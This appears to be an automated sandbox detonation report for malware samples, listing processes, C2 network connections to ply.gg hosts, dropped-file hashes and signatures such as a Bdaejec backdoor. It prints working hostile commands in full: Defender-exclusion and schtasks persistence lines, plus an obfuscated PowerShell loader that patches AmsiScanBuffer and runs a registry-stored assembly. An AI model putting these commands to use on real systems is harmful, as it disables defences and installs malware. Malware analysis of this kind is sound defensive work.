C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe c433d048eb1e844cc12215c24ac88b7f P7kiv3bMr0C2WxY/1AC6qw.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:MlddtWyOVLTW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JUtmYuQkexpjJE,[Parameter(Position=1)][Type]$KnTJBWhiuA)$QWnwIixgpdT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+'la'+'s'+'s,'+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+'s'+','+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QWnwIixgpdT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+'e'+'B'+'ySig,Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JUtmYuQkexpjJE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$QWnwIixgpdT.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$KnTJBWhiuA,$JUtmYuQkexpjJE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+'e'+'d');Write-Output $QWnwIixgpdT.CreateType();}$mSwoYymFuWlVE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+[Char](97)+'t'+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$zUmNWvNEfvGxgY=$mSwoYymFuWlVE.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'rocA'+[Char](100)+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lEztCYVLuVtJPkcYJYi=MlddtWyOVLTW @([String])([IntPtr]);$jICCRMIPPqRnYXtvJdldLM=MlddtWyOVLTW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KIwfODEbxgj=$mSwoYymFuWlVE.GetMethod('Ge'+'t'+''+'M'+'o'+'d'+''+'u'+'le'+'H'+''+[Char](97)+''+'n'+''+'d'+'le').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$OeAuXBiyErhtak=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$BOchzXxqRvbXTKEFb=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'al'+[Char](80)+'ro'+'t'+''+[Char](101)+''+[Char](99)+'t')));$CXOJPir=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeAuXBiyErhtak,$lEztCYVLuVtJPkcYJYi).Invoke('a'+'m'+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jIaFoqTzGsQyvAiqw=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$CXOJPir,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$NqCesFVuxP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,4,[ref]$NqCesFVuxP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jIaFoqTzGsQyvAiqw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,0x20,[ref]$NqCesFVuxP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+'o'+''+[Char](100)+''+'e'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d71cd49a-0d08-422d-a6a6-1cd83e29f9ab}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
Files
memory/3816-0-0x00007FFC6F2B3000-0x00007FFC6F2B5000-memory.dmp
memory/3816-1-0x0000000000EB0000-0x0000000000F12000-memory.dmp
memory/2344-2-0x000001EBB1E30000-0x000001EBB1E52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mucxyq.10e.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2344-12-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-13-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-14-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-15-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-16-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-19-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/3816-22-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
| SHA512 | 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | af1cc13f412ef37a00e668df293b1584 |
| SHA1 | 8973b3e622f187fcf484a0eb9fa692bf3e2103cb |
| SHA256 | 449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037 |
| SHA512 | 75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3 |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/3552-61-0x0000000000AA0000-0x0000000000AC2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70e829e200994d93172199e56c369439 |
| SHA1 | 051915bb2944acc4de6b948913c7cfddaebd3aa2 |
| SHA256 | 5c09ae4bd7edd4d26fc157b2eeaf2c1dfe81dc9ff551c5f359773443de7b0d1f |
| SHA512 | b722a32b6b13a8f536743699ec13b6e2c6c8532cb2b2652d6c3b561b970e2a542f8e88b1644d91b8ace8d7ea6313ad667d0e8d3b4c6f5a51f560ded716c407fe |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3816-100-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/1052-101-0x00000000002A0000-0x00000000002C2000-memory.dmp
memory/1704-102-0x000001FB289B0000-0x000001FB289DA000-memory.dmp
memory/1704-104-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp
memory/1704-103-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp
memory/1692-108-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-112-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-114-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp
memory/1692-115-0x0000000140000000-0x0000000140008000-memory.dmp
memory/684-136-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/684-135-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp
memory/480-156-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/480-155-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp
memory/480-150-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp
memory/424-166-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/424-165-0x000002A41A960000-0x000002A41A98A000-memory.dmp
memory/424-160-0x000002A41A960000-0x000002A41A98A000-memory.dmp
memory/964-146-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/964-145-0x0000025886BA0000-0x0000025886BCA000-memory.dmp
memory/964-140-0x0000025886BA0000-0x0000025886BCA000-memory.dmp
memory/684-131-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp
memory/632-126-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/632-125-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-120-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-119-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-118-0x000002807B030000-0x000002807B055000-memory.dmp
memory/1692-113-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
159s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Bdaejec
Bdaejec family
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdb.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsimport.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
